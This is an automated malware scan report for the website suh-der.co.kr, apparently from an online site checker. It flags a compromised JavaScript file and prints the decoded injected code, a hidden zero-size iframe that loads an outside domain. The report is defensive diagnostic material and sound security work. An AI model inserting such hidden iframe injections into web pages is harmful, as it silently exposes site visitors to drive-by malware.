Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=suh-der.co.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.suh-der.co.kr/ | 200 OK Content-Length: 18440 Content-Type: text/html | clean |
http://www.suh-der.co.kr/./swf/js/flashObj-1.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://www.suh-der.co.kr/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://www.suh-der.co.kr/./swf/js/flashObj.js | 200 OK Content-Length: 2513 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function FlashObject(swf, width, height, flashvars) { var strFlashTag = new String(); if (navigator.appName.indexOf("Microsoft") != -1) { strFlashTag += '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" '; strFlashTag += 'codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=version=8,0,0,0" width="' + width + '" height="' + height + '">'; strFlashTag += '<p Decoded script: <iframe src=http://jejunamwon.com/index.html width=0 height=0></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: suh-der.co.kr
Result:
GET / HTTP/1.1
Host: suh-der.co.kr
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: suh-der.co.kr
Referer: http://www.google.com/search?q=suh-der.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: suh-der.co.kr
Referer: http://www.google.com/search?q=suh-der.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.